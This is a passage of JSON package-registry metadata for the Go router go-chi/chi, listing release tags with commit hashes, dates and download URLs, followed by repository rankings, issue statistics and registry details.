url":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.1/manifests"},{"name":"v3.2.0","sha":"ba73ba0623af32e4e5f09880177e73bd78d98852","kind":"commit","published_at":"2017-08-22T17:58:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.2.0/manifests"},{"name":"v3.1.5","sha":"25354a53cca531cb2efd3f1d3c565d90ff04d802","kind":"commit","published_at":"2017-08-02T21:27:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.5/manifests"},{"name":"v3.1.4","sha":"b8567b6442e27704bfeb725095091581cbe82a00","kind":"commit","published_at":"2017-07-27T15:16:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.4/manifests"},{"name":"v3.1.3","sha":"524a020446146841512dd1639e736422e7af53a4","kind":"commit","published_at":"2017-07-25T17:24:32.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.3/manifests"},{"name":"v3.1.2","sha":"7e6b856011d49775bb45d829339287a416a85f66","kind":"commit","published_at":"2017-07-24T20:38:22.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.2/manifests"},{"name":"v3.1.1","sha":"12a98d329f12aac9e94b72c713437350c948a5e2","kind":"commit","published_at":"2017-07-21T14:22:28.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"08660a0ad10a8fa7beab3ad43afe66373d49d06a","kind":"commit","published_at":"2017-07-10T19:19:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"967844826e58cf31213a7dfb82455d242ad85101","kind":"commit","published_at":"2017-06-21T19:28:24.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.0.0/manifests"},{"name":"v2.1.0","sha":"e6033ea75479391a4bce3918fc119cad31e1cb30","kind":"commit","published_at":"2017-03-30T18:41:17.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"54f435d539226571eab1987ed862b1c0fdfdc892","kind":"commit","published_at":"2017-01-06T20:47:52.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.0.0/manifests"},{"name":"v1.0.0","sha":"dcbb8f81eea01aaaa5b6f9bffc229e9e9e0256bb","kind":"commit","published_at":"2016-06-22T21:59:16.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.0.0/manifests"},{"name":"v0.9.0","sha":"c420d7fbf4428b27e31d83591e5e2267d84f9f20","kind":"commit","published_at":"2016-03-31T13:51:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v0.9.0","html_url":"https://github.com/go-chi/chi/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-08-08T10:51:35.219Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":0.42444926529425825,"forks_count":0.6257877057855061,"average":4.348809308704352},"purl":"pkg:golang/gopkg.in/go-chi/chi.v3","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/gopkg.in/go-chi/chi.v3","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/gopkg.in/go-chi/chi.v3","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/gopkg.in/go-chi/chi.v3/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v3/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v3/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v3/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v3/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v3/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/gopkg.in%2Fgo-chi%2Fchi.v3/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":9868091,"name":"github.com/GO-CHI/chi/v5","ecosystem":"go","description":null,"homepage":null,"licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/GO-CHI/chi","keywords_array":[],"namespace":null,"versions_count":24,"first_release_published_at":"2021-02-28T00:11:55.000Z","latest_release_published_at":"2026-07-05T18:51:45.000Z","latest_release_number":"v5.3.1","last_synced_at":"2026-08-12T02:06:16.672Z","created_at":"2024-05-04T04:45:38.196Z","updated_at":"2026-08-12T02:06:16.672Z","registry_url":"https://pkg.go.dev/github.com/GO-CHI/chi/v5","install_command":"go get 